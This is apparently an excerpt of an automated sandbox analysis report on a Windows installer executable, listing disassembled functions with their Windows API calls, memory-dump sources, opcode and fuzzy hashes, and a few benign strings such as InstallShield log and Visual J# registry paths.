                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _memset$BrowseFolderFromH_prolog3_ListMallocPath
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1804835819-0
                                                                                                                                                                          • Opcode ID: 1b6417024eee3519f05a7a549f2077f80fadf4c0ada541a896abf58eb348135f
                                                                                                                                                                          • Instruction ID: a4d15fc88e5de2aa7edf28e996c0c902747226d9099c3326b848a016c736ca00
                                                                                                                                                                          • Opcode Fuzzy Hash: 1b6417024eee3519f05a7a549f2077f80fadf4c0ada541a896abf58eb348135f
                                                                                                                                                                          • Instruction Fuzzy Hash: A8414F70A001589EDF10EB64CC45BDEB7F8BF45304F5084EAE589A7291DF389A85CF95
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00403460, Relevance: 9.1, APIs: 6, Instructions: 108COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLastError.KERNEL32(CC858012,?,00000000,74B04C30), ref: 0040349F
                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,000000FF), ref: 00403539
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00403553
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00403560
                                                                                                                                                                          • SetLastError.KERNEL32(?), ref: 00403584
                                                                                                                                                                          • SetLastError.KERNEL32(?,?,00000000,74B04C30), ref: 0040358A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$FreeString
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2425351278-0
                                                                                                                                                                          • Opcode ID: 648342a7162756d4d9b58660e3c131bbc26fb660a3c6a9b4ab2426855c0fd8ac
                                                                                                                                                                          • Instruction ID: 0269f8f363d4cbc21e7e9f9306b3b77d3fc03f1760271261ca679db9460554de
                                                                                                                                                                          • Opcode Fuzzy Hash: 648342a7162756d4d9b58660e3c131bbc26fb660a3c6a9b4ab2426855c0fd8ac
                                                                                                                                                                          • Instruction Fuzzy Hash: B2417A716082019FD714EF28C941A2BBBE5EF84714F504A2EF45A972A1DB75ED04CB86
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0045FB60, Relevance: 9.1, APIs: 6, Instructions: 94fileCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,CC858012,?,?,00000000,?,0043D0DA,?), ref: 0045FBAE
                                                                                                                                                                          • CreateFileMappingW.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000000,?,?,00000000,?,0043D0DA,?), ref: 0045FBC6
                                                                                                                                                                          • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,?,00000000,?,0043D0DA,?), ref: 0045FBDE
                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,0043D0DA,?,?,00000000,?,0043D0DA,?), ref: 0045FBF4
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,00000000,?,0043D0DA,?), ref: 0045FC2C
                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,00000000,?,0043D0DA,?), ref: 0045FC38
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$CloseCreateHandle$MappingSizeView
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2246244431-0
                                                                                                                                                                          • Opcode ID: df3972e7d6dc94a64372bc7c0806932b65a03d5d6bf3f3833bff9e296955e212
                                                                                                                                                                          • Instruction ID: 81e50334cc788f241bb9001468ab4bc4d8b39cdbf998cacefc4f154b212c9ea3
                                                                                                                                                                          • Opcode Fuzzy Hash: df3972e7d6dc94a64372bc7c0806932b65a03d5d6bf3f3833bff9e296955e212
                                                                                                                                                                          • Instruction Fuzzy Hash: 0D31D474600748BEEB218F658C89F6BBBA8EB45B14F10413AFD14A63C2C7759948C669
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0043F7CA, Relevance: 9.1, APIs: 6, Instructions: 68stringCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,00420374,?,0000000C,0000000C,?,?,00000000,?,?,?), ref: 0043F7E1
                                                                                                                                                                          • lstrcpyW.KERNEL32 ref: 0043F800
                                                                                                                                                                          • lstrcatW.KERNEL32(00000000,00477E70), ref: 0043F80C
                                                                                                                                                                          • lstrlenW.KERNEL32(00000000,?,?,00420374,?,0000000C,0000000C,?,?,00000000,?,?,?,CacheFolder,?,00000001), ref: 0043F815
                                                                                                                                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,00420374,?,0000000C,0000000C,?,?,00000000,?,?,?,CacheFolder,?), ref: 0043F82F
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,00420374,?,0000000C,0000000C,?,?,00000000,?,?,?,CacheFolder,?,00000001,00483E18), ref: 0043F839
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: lstrlen$CreateDirectoryErrorLastlstrcatlstrcpy
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4043630017-0
                                                                                                                                                                          • Opcode ID: 9303ea9dd92b951dfbaa50484d47945b9aa61c1e8bb18ddc0a4c3576268d5e9b
                                                                                                                                                                          • Instruction ID: 31edd05cb1a647d2c07ca1964f328e4ebaceeb35f237e1aaf61254e263cd1a5d
                                                                                                                                                                          • Opcode Fuzzy Hash: 9303ea9dd92b951dfbaa50484d47945b9aa61c1e8bb18ddc0a4c3576268d5e9b
                                                                                                                                                                          • Instruction Fuzzy Hash: CA117772A00305ABEB186BB5DC45A6B77ADEB48354F20503BF90DD6191D778D9408B58
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0043FA88, Relevance: 9.1, APIs: 6, Instructions: 61stringCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: lstrcpy$_wcsrchr$CharNext
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3722002711-0
                                                                                                                                                                          • Opcode ID: a28963779139cf3fdb804d6e77bc23e2547e3c14b3cb12e67531dbd86c58de7b
                                                                                                                                                                          • Instruction ID: e9bcb1c9a77514586128187bb6b1bd9d0717b8867c30e795bd750b77f9749a65
                                                                                                                                                                          • Opcode Fuzzy Hash: a28963779139cf3fdb804d6e77bc23e2547e3c14b3cb12e67531dbd86c58de7b
                                                                                                                                                                          • Instruction Fuzzy Hash: 6111A776A00218AFDB60DF64DC40E9EB7F8FB49350F0040BAE549E3240DE34DD488B98
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00440B84, Relevance: 9.1, APIs: 6, Instructions: 58stringCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • _memset.LIBCMT ref: 00440BBE
                                                                                                                                                                          • CharNextW.USER32(?,?,?,004A4DA0), ref: 00440BC7
                                                                                                                                                                          • lstrcpyW.KERNEL32 ref: 00440BDB
                                                                                                                                                                          • CharNextW.USER32(00000000,?,?,004A4DA0), ref: 00440BF0
                                                                                                                                                                          • CharPrevW.USER32(00000000,00000000,?,?,004A4DA0), ref: 00440C09
                                                                                                                                                                          • lstrcpyW.KERNEL32 ref: 00440C24
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Char$Nextlstrcpy$Prev_memset
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3355883774-0
                                                                                                                                                                          • Opcode ID: 2fa2676458f834c079688b3e5b12c2850d0cb4d43c284c4dff1d097302f8f75f
                                                                                                                                                                          • Instruction ID: 64289ccc0ebac8a2fad1895704337603e4d2db59093f3911c2237bfb149bebdf
                                                                                                                                                                          • Opcode Fuzzy Hash: 2fa2676458f834c079688b3e5b12c2850d0cb4d43c284c4dff1d097302f8f75f
                                                                                                                                                                          • Instruction Fuzzy Hash: 11119871940218AADB51EBA0DD4999B73BCFF44304F0144A7E249D7150DA746E88CBA8
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0042FB82, Relevance: 9.0, APIs: 6, Instructions: 30windowCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Item$EnableWindow$Focus
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 864471436-0
                                                                                                                                                                          • Opcode ID: a2497a695f5f20b0819f08c56531db3b6b7cf9df74ad01596c4617ef5ac4de44
                                                                                                                                                                          • Instruction ID: 9d619b0bf6a7a9bf048a6c4f41078e9e0e093828bbb8fc522f64ba9d1e5f9aef
                                                                                                                                                                          • Opcode Fuzzy Hash: a2497a695f5f20b0819f08c56531db3b6b7cf9df74ad01596c4617ef5ac4de44
                                                                                                                                                                          • Instruction Fuzzy Hash: F2F0B771100659EBCF216F51EC09F5B3F6AEB84302F514836F504911B187B6A9A4DF69
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0045BCCE, Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 234COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0045BCD8
                                                                                                                                                                            • Part of subcall function 0040C384: __EH_prolog3.LIBCMT ref: 0040C38B
                                                                                                                                                                            • Part of subcall function 0040C384: GetLastError.KERNEL32(00000004,00433A61,?,00000000,00000004,0040EF8C,?,00000001), ref: 0040C3AD
                                                                                                                                                                            • Part of subcall function 0040C384: SetLastError.KERNEL32(?,00000000), ref: 0040C3ED
                                                                                                                                                                            • Part of subcall function 0045B867: __EH_prolog3_GS.LIBCMT ref: 0045B86E
                                                                                                                                                                            • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
                                                                                                                                                                            • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$H_prolog3_$H_prolog3
                                                                                                                                                                          • String ID: HsG$HsG$HsG$]
                                                                                                                                                                          • API String ID: 532146472-3623979117
                                                                                                                                                                          • Opcode ID: 6e3118012fd750dc6c53b4988793253a640f5caf85adf5ba554f46af1e9dfe4f
                                                                                                                                                                          • Instruction ID: 621b2d32b559991168a5cdd18755e8c18f361374da92d371e6b76218741a7f82
                                                                                                                                                                          • Opcode Fuzzy Hash: 6e3118012fd750dc6c53b4988793253a640f5caf85adf5ba554f46af1e9dfe4f
                                                                                                                                                                          • Instruction Fuzzy Hash: EEA18171800118EFCB15DBA5CC91BDEB7B8BF15304F5441AEE909A3282EB746B88CF65
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00428ECA, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 169COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00428ED4
                                                                                                                                                                            • Part of subcall function 004025E0: GetLastError.KERNEL32(CC858012,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 00402630
                                                                                                                                                                            • Part of subcall function 004025E0: SetLastError.KERNEL32(?,00483E18,00000000,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 004026A8
                                                                                                                                                                            • Part of subcall function 00435F95: __EH_prolog3_GS.LIBCMT ref: 00435F9F
                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                            • Part of subcall function 0042B977: __EH_prolog3_catch.LIBCMT ref: 0042B97E
                                                                                                                                                                            • Part of subcall function 0042B977: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 0042B992
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$FreeH_prolog3_String$Concurrency::details::_Concurrent_queue_base_v4::_H_prolog3_catchInternal_throw_exception
                                                                                                                                                                          • String ID: 1033$J#Version$SOFTWARE\Microsoft\Visual JSharp Setup\Redist$Startup
                                                                                                                                                                          • API String ID: 1602809483-1919874662
                                                                                                                                                                          • Opcode ID: d53d6130d6d264d9cb8cd05675826637091d6fadf1489e0200aff15993115bf5
                                                                                                                                                                          • Instruction ID: 14f342ceb626aa84de4d9507cab1b6860b727b1aa20d7a0873be447e8848ae8d
                                                                                                                                                                          • Opcode Fuzzy Hash: d53d6130d6d264d9cb8cd05675826637091d6fadf1489e0200aff15993115bf5
                                                                                                                                                                          • Instruction Fuzzy Hash: B8616C71900168DACB20DB95CC81BEDB7B8AF50304F5084EBE10AB7191DB795F89CF69
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0045509B, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 130COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • _memmove.LIBCMT ref: 0045510E
                                                                                                                                                                          • _memmove.LIBCMT ref: 00455147
                                                                                                                                                                          • _memmove.LIBCMT ref: 0045517F
                                                                                                                                                                          • _memmove.LIBCMT ref: 004551A8
                                                                                                                                                                            • Part of subcall function 00441423: std::exception::exception.LIBCMT ref: 00441436
                                                                                                                                                                            • Part of subcall function 00441423: __CxxThrowException@8.LIBCMT ref: 0044144B
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                                                                                                          • String ID: deque<T> too long
                                                                                                                                                                          • API String ID: 1300846289-309773918
                                                                                                                                                                          • Opcode ID: 2c7332f8466c2cb557cfd69f5a75fac8b0ec67a396cdbf2bf06dd5614dde0a71
                                                                                                                                                                          • Instruction ID: ecb53842e9072314e3327d466ce02600a3ed2c257f157b4adbcde03a9951e8bb
                                                                                                                                                                          • Opcode Fuzzy Hash: 2c7332f8466c2cb557cfd69f5a75fac8b0ec67a396cdbf2bf06dd5614dde0a71
                                                                                                                                                                          • Instruction Fuzzy Hash: C241F8B2D00625ABD710DF99CD42AAFB768EB40364F14832AF924E7241D774AE54C7D4
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004042B0, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLastError.KERNEL32(CC858012,?,74B04C30,74B04D40), ref: 00404373
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 0040438F
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 0040439A
                                                                                                                                                                          • SetLastError.KERNEL32(?), ref: 004043BA
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorFreeLastString
                                                                                                                                                                          • String ID: HsG
                                                                                                                                                                          • API String ID: 3822639702-1835203436
                                                                                                                                                                          • Opcode ID: 28d39bb818197e2999583928289702a82eb8be35f25ce6e9140f6755c8fc59c1
                                                                                                                                                                          • Instruction ID: e6d77d7b499982b3e090db9fe78de37c08dca1200a250ee095ae04ed91534034
                                                                                                                                                                          • Opcode Fuzzy Hash: 28d39bb818197e2999583928289702a82eb8be35f25ce6e9140f6755c8fc59c1
                                                                                                                                                                          • Instruction Fuzzy Hash: D1418A71600209ABCF14EF64C944B9A77E4FF44718F51823AFD19AB2D1DB38E908CB98
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00455C8A, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 116COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00455C91
                                                                                                                                                                            • Part of subcall function 0040F638: __EH_prolog3_GS.LIBCMT ref: 0040F63F
                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                            • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
                                                                                                                                                                            • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00455D85
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
